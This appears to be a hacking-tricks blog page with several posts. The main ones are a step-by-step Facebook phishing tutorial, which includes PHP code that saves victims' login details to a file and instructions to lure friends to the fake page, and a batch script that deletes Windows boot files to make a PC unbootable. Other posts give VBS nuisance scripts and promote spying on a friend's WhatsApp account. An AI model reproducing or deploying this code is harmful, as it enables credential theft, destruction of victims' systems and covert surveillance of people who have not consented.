Search This Blog

Showing posts with label Basic Hacking ID'S. Show all posts
Showing posts with label Basic Hacking ID'S. Show all posts

Monday, February 8, 2016

Step by step guide to hack Facebook account using phishing method

what is phishing ?

Phishing is an old method of e-mail fraud that is used to gather personal and financial information from the recipients. phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.Phishing is an example of a social engineering technique.

***Step by step guide to hack Facebook account using phishing ***

Now lets start our tutorial which is all about how to make facebook phishing page without having the knowledge of any type of coding .

step:1)
first of all Go to the Facebook.com

step:2)  and then right click on the blank area, you will see the option view source page,simply click on that.(see bellow picture for better understanding )

Wednesday, October 7, 2015

Monitor and Spy Friend Whatsapp Account from WhatsDog

Monitor and Spy Friend Whatsapp Account from WhatsDog


We all worried about our friends activity. In this post I tell you how can you spy on any Whatsapp account like your friend account. You don’t need any big setup this setup is done by creepy simple android app. This Spy android appm named is Whatsdog. 

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9mbkTxTecv7qEA9JZnJTr34WvdVPtvnQDCJpp-oe3crCcApqXeY80XrbQBN5qPeoDHwk_RPuV9fcjpJyVGSuGhIaDJaZPXvy5nBuX4atDITf0Od5h79O3dj3EA0modl6zmJ_Eja23Ti4/s1600/logowat.jpg

Monday, October 5, 2015

Some dangerous notepad hacking tricks

Some dangerous notepad hacking tricks
How to make some virus in notepad:

1.Open notepad.
2.copy the codes given below.
3.save it with correct extensions.
4.Open the saved files.
5.Done.

Wednesday, September 30, 2015

HACK THE KEYBOARD


THIS WILL HACK UR KEYBOARD AND TILL SHUTDOWN U WILL NT ABLE TO TYPE ANYTHING !!!

JST COPY THE BELOW GIVEN CODE TO NOTEPAD :


MsgBox "YOUR KEYBOARD HAS BEEN HACKED. YOU ARE A FOOL"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
sadddddddddddddddddddddddsssssssssssssssssssssssssssssssssssssssssvgb ghvb

SAVE IT AS  KEYHACK.vbs

LET'S GO BACK FEW STEPS

THIS CODE WILL JST TAKE U AS BACK AS IT CAN IN UR COMPUTER

JST COPY BELOW GIVEN CODE TO NOTEPAD :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do

HACK UR CD ROM

THIS TRICK WILL CERTAINLY MAKE UR CD ROM TO OPEN AND CLOSE TILL UR COMPUTER IS NT SHUTDOWN

JST COPY THE BELOW GIVEN CODE TO NOTEPAD :



Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject

Tuesday, September 29, 2015

How To Download Videos From Youtube?

How To Download Videos From Youtube?




Every person who watches you tube videos,wants to download the videos but they don't how to download.so today I posted these trick to download youtube videos without any software
how to download you tube videos?
1.open the video in you tube that you to download



2.then just type ss after www. in the link and hit enter.
3.Then a new window opens,savefrom.net
4.select the video clarity,there are nearly seven types of clarity options.

5.After clicking that a dialogue box appears ,select save file and then click on ok

6.then your video starts downloadin

How To Hack Facebook Account Password Phishing Method

How To Hack Facebook Account Password Phishing Method


I think all will be curious to know how to hack friends fb account password.today i am going to say how to hack fb password easily,you don't want to learn any coding juct follow the below steps to hack :
There are four ways to hack facebook account;

1.Facebook phising
2.remote update facebook status [social engineering]
3.Man in middle attack
4.Key logging
Now Iam going to explain about phising method which is very simple,easy and famous methods of facebook hacking
what is phising?
phising is nothing but creating a fake page of fabook and upload to internet through free webhosting services.If any one  login through your fake facebook page which looks like original,all the passwords of the victims are saved in your web directory.
Follow these steps:
STEP1:open facebook login page ,if you are already logged in logout first,then right click on that page and select view source code

Now a new window opens with some code
STEP2:Now open notepad and copy all the code into that and search for the below code by pressing ctrl +f and type action

you will get 9 results then find the below code in that 9 results by pressing next 
action="https://www.facebook.com/login.php?login_attempt=1"
change it to 
action="post.php"  
and also change the method=post line before action to method=get 
STEP3:save the above file as index.htm not index.html
step4:Now copy the below code and paste it note pad and save it as post.php
 <?php
header ('Location:http://www.facebook.com/');
$handle = fopen("passwords.html", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 
step5:now create a empty notepad file and save it as passwords .html
Now upload the three files to a free webhosting site like 000webhost 
steps to upload the 3 files to 000 webhost:
1.sign up to 000 webhost,select a subdomain which ever you want.

2.confirm your account clicking on confirmation link send to your email account
3.now go to control pannel and click on filemanager

4.after that a new window will open ,open public.html and delete default.php

5.then upload the three files by clicking on upload on the top

Now send your phising page link to your friends by posting a message earn money by loggong into facebook through this link
then every body will login to fb through your page 
If anyone log in through this page open passwords.html in public html to see the logged in account email and password

NOTE:this only for educational purpose don,t misuse it okay  

How to crash a PC Forever !:::

How to crash a PC Forever !:::

How to crash a PC Forever !:::


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)
**Also remember this might not work with vista.**